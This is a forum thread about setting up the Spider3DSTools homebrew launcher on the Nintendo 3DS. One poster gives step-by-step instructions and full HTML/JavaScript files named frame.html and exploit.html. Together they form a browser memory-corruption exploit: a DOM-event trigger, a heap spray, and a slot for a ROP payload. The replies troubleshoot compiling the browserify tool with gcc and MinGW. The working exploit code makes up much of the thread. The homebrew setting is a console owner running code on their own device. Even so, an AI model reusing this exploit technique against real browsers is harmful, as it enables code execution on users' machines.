Toggle sidebar

Homebrew [Custom Launcher] Spider3DSTools released

  • Thread starter Thread starter Lord Prime
  • Start date Start date
  • Views Views 156,566
  • Replies Replies 748
  • Likes Likes 17
Slushie3DS said:
>Compile Browserify.
>Use Browserify to compile your loadcode binary as Javascript.
>Make a new .html document named frame.html.
>Paste this inside:
Code: 
<html>
    <head>
        <script>
            var nb = 0;
            function handleBeforeLoad() {
                if (++nb == 1) {
                    p.addEventListener('DOMSubtreeModified', parent.dsm, false);
                } else if (nb == 2) {
                    p.removeChild(f);
                }
            }
 
            function documentLoaded() {
                f = window.frameElement;
                p = f.parentNode;
                var o = document.createElement("object");
                o.addEventListener('beforeload', handleBeforeLoad, false);
                document.body.appendChild(o);
            }
 
            window.onload = documentLoaded;
        </script>
    </head>
    <body>
        KEKEKEKEK...
    </body>
</html>
Create a new HTML file named "exploit.html" with the contents below
<html>
<head>
<style>
    body {
        color:white;
        background:black;
    }
 
 
</style>
<script>
    function magicfun(mem, size, v) {
        var a = new Array(size - 20);
        nv = v + unescape("%ucccc");
        for (var j = 0; j < a.length / (v.length / 4); j++) a[j] = nv;
        var t = document.createTextNode(String.fromCharCode.apply(null, new Array(a)));
 
        mem.push(t);
    }
 
    function dsm(evnt) {
        var mem = [];
 
        for (var j = 20; j < 430; j++) {
            magicfun(mem, j, unescape("YOUR PAYLOAD HERE"));
        }
    }
</script>
</head>
<body>
        <h1 align="center">LOADING ROP...</h1>
        <iframe width=0 height=0 src="frame.html"></iframe>
</body>
</html>
>Create another .html document named exploit.html.
>Paste this inside:
Code: 
<html>
<head>
<style>
    body {
        color:white;
        background:black;
    }
 
 
</style>
<script>
    function magicfun(mem, size, v) {
        var a = new Array(size - 20);
        nv = v + unescape("%ucccc");
        for (var j = 0; j < a.length / (v.length / 4); j++) a[j] = nv;
        var t = document.createTextNode(String.fromCharCode.apply(null, new Array(a)));
 
        mem.push(t);
    }
 
    function dsm(evnt) {
        var mem = [];
 
        for (var j = 20; j < 430; j++) {
            magicfun(mem, j, unescape("YOUR PAYLOAD HERE"));
        }
    }
</script>
</head>
<body>
        <h1 align="center">LOADING ROP...</h1>
        <iframe width=0 height=0 src="frame.html"></iframe>
</body>
</html>
>Replace YOUR PAYLOAD HERE with your Browserift loadcode binary Javascript output.
>Host both.
>Profit.

Edit: I'm hopeful that Yifan posts some news, even slight, sometime soon. I am becoming terribly bored being on 8.x, and I can't update to 9.4 if I want to use the exploit he talked of. I have attempted to convert S3DST to 8.x, and have only got some of it to work. I'm tempted to disassemble my 2DS, see if the NAND set up is the same as the 3DS, hard-mod a NAND flasher into it, dump my current firmware, update, dump, play, then reflash 8.1 when he is done.
Click to expand...

How the hell do you compile browserify.c? I run a command window, and it made the other stuff fine, but browserify is not specified in the Makefile.
 
DarkFlare69 said:
How the hell do you compile browserify.c? I run a command window, and it made the other stuff fine, but browserify is not specified in the Makefile.
Click to expand...

Have you gcc installed? You compile it like any.

Compile browserify with:
Code: 
gcc -o browserify browserify.c

Run browserify with:
Code: 
browserify LoadCode.dat > js_output.txt

Said Javascript output will be inside of the .txt created by browserify.
 
Slushie3DS said:
Have you gcc installed? You compile it like any.

Compile browserify with:
Code: 
gcc -o browserify browserify.c

Run browserify with:
Code: 
browserify LoadCode.dat > js_output.txt

Said Javascript output will be inside of the .txt created by browserify.
Click to expand...

Yes, I have gcc installed. When I open a command window and type "make", it makes all the other files except browserify. And when I type what you put, "gcc -o browserify browserify.c" it says 'gcc' is not recognized as an internal command.
 
DarkFlare69 said:
Yes, I have gcc installed. When I open a command window and type "make", it makes all the other files except browserify. And when I type what you put, "gcc -o browserify browserify.c" it says 'gcc' is not recognized as an internal command.
Click to expand...

Are you sure you have gcc installed? Your computer seems to think otherwise.
 
Here you go, DarkFlare69.

Folder Before:


Terminal Before:


Terminal After:



Folder After:


I'm unsure why it is doing that to you. I have a few hunches, though.
>Restart your PC.
>Make sure to set PATH correctly.
>Make sure to have command line in designated folder.
>Attempt then.
 
Slushie3DS said:
Here you go, DarkFlare69.

Folder Before:


Terminal Before:


Terminal After:



Folder After:


I'm unsure why it is doing that to you. I have a few hunches, though.
>Restart your PC.
>Make sure to set PATH correctly.
>Make sure to have command line in designated folder.
>Attempt then.
Click to expand...

Looking at your screenshots, it should not be compiled beforehand. Lemme try again.
 
Slushie3DS said:
>Compile Browserify.
>Use Browserify to compile your loadcode binary as Javascript.
>Make a new .html document named frame.html.
>Paste this inside:
Click to expand...

Thanks for this! I've got regionthree running locally without launch.dat now. One thing though, you kinda messed up on your first code block. You've got the contents of the exploit html at the end.
 
WulfyStylez said:
Thanks for this! I've got regionthree running locally without launch.dat now. One thing though, you kinda messed up on your first code block. You've got the contents of the exploit html at the end.
Click to expand...

Oopsie daisies, you're right. It's been a long day, friends. This is the correct code for the frame.html:
Code: 
<html>
    <head>
        <script>
            var nb = 0;
            function handleBeforeLoad() {
                if (++nb == 1) {
                    p.addEventListener('DOMSubtreeModified', parent.dsm, false);
                } else if (nb == 2) {
                    p.removeChild(f);
                }
            }
 
            function documentLoaded() {
                f = window.frameElement;
                p = f.parentNode;
                var o = document.createElement("object");
                o.addEventListener('beforeload', handleBeforeLoad, false);
                document.body.appendChild(o);
            }
 
            window.onload = documentLoaded;
        </script>
    </head>
    <body>
        KEKEKEKEK...
    </body>
</html>

DarkFlare69 said:
Looking at your screenshots, it should not be compiled beforehand. Lemme try again.
Click to expand...

Yes, what you are doing is COMPILING it, meaning you're turning the C document into some sort of executable. The gear icon I am hovering over in the last screenshot is the resulting executable. That executable is use with this code INSIDE of your spider3DStools folder:
Code: 
browserify LoadCode.dat > js_output.txt
 
DarkFlare69 said:
Yes, I have gcc installed. When I open a command window and type "make", it makes all the other files except browserify. And when I type what you put, "gcc -o browserify browserify.c" it says 'gcc' is not recognized as an internal command.
Click to expand...
Just install MinGW, and use the get software to get the gcc file, also you may have to specify to download an extra library, I forgot which one it is, but I think it was libgcc.dll. Running gcc will tell you if you are missing a library by stating which dll is missing.
 
RandomUser said:
Just install MinGW, and use the get software to get the gcc file, also you may have to specify to download an extra library, I forgot which one it is, but I think it was libgcc.dll. Running gcc will tell you if you are missing a library by stating which dll is missing.
Click to expand...

Okay, thanks. I'll try this.

And Slushie3DS its still not working.
 

Site & Scene News

Go to forum More news

Popular threads in this forum

Why did the price of 3ds shoot up ?

Hacking Homebrew Project  BlazerTube - a YouTube 3DS revival using the REAL app!

Homebrew app Emulator  [Release] 3DS-CLI - Run a real RISC-V Linux environment on the Nintendo 3DS

Problems getting Homebrew to appear outside of the Homebrew Launcher (homebrew won't appear on the HOME menu)

Website for finding alternative games for 3DS

Hardware  2 Broken 3DSes, need help

Gaming  any good rpgs on 3ds?

Hacking  Modding Reassurance